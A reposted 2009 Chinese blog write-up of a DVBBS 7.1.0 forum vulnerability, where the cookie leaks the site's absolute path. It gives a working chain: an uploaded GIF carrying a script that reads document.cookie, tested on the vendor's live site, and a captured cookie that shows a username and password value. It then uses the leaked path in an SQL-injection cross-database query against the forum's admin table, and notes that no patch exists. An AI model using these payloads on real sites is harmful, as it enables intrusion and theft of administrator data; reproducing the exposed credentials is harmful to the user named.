dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞_VB.NET程序_学习笔记★闵涛★计算机学习电脑编程软硬件技巧


	转至繁体中文版	\| 网站首页 \| 图文教程 \| 资源下载 \| 站长博客 \| 图片素材 \| 武汉seo \| 武汉网站优化 \|

dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞

作者：闵涛文章来源：闵涛的学习笔记点击数：959 更新时间：2009/4/23 15:04:09

动网官方与站长站均存在严重漏洞，可大致入侵，内有说名，请尽快修复！
dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞
dvbbs 7.1.0 的cookie存在泄露站点的绝对路径的漏洞，攻击者可以配合其它技术，实现sql跨库查询等。
漏洞利用例子:
一、泄露绝对漏洞测试:
对官方的测试站点:bbs.dvbbs.net
上传一张图，代码如下:
gif89a
[code]<script>
alert(document.cookie)
</script>[/code]
抓包得到cookie如下
cookie: aspsessionidssdscbqd=nhanobncapcpamcfmagdijcb; dwebdvbbs7%2e1%2e0=userid=617054&usercookies=1&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&username=linzibct&password=t8ob621664s5v6hl&userhidden=2&statuserid=2189992004; dvbbs=
分析cookie可以得到站点的绝对路径如下:
d:\\web\\dvbbs7为论谈的绝对路径
二、攻击延伸:
www.host.com
主程序存在sql注入漏洞，但是找不到表名和字段名。
注入点假设:
www.host.com\\linzi.asp?****=you
论谈为dvbbs 7.1.0 ，数据库为data\\\\dvbbs.asp，做了防下载处理.
利用上面的动网暴路径，抓包得到绝对路径为 d:\\www\\dvbbs\\data\\dvbbs.asp
实现跨库查询如下:
www.host.com\\linzi.asp?****=you and (select count(*) from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp")
官方补丁:
尚无

[Delphi程序]开发Web应用程序中Cookie使用的问题  [VB.NET程序]XSL、XML教程-DVBBS皮肤制作最基本的语法
[Web开发]javascript读写cookie的一个小demo  [Web开发]JavaScript写的cookie类
[Web开发]初学Javascript之cookie篇(译)  [Web开发]Asp.net中Cookie简明参考
[Web开发]ASP.NET状态存储管理九大兵器之五（Cookie）  [Web开发]用ASP.NET加密Cookie数据
[Web开发]ASP.NET Forms Authentication所生成Cookie的安全…  [Web开发][原创]VB.net技巧之七----asp.net中cookie的使用

教程录入：mintao 责任编辑：mintao

上一篇教程：再次让动网下地狱(DVBBS最新漏洞 6月17日)已带简单补丁

下一篇教程： VBScript语言基础知识

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

注：本站部分文章源于互联网，版权归原作者所有！如有侵权，请原作者与本站联系，本站将立即删除！本站文章除特别注明外均可转载，但需注明出处！ [MinTao学以致用网]

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

同类栏目

· C语言系列 · VB.NET程序
· JAVA开发 · Delphi程序
· 脚本语言

热门推荐

没有教程

赞助链接

闵涛博文

500 - 内部服务器错误。

您查找的资源存在问题，因而无法显示。

鄂公网安备 42011102001154号

站长：MinTao ICP备案号：鄂ICP备11006601号-18

闵涛站盟:医药大全-武穴网。A打造B、C、D……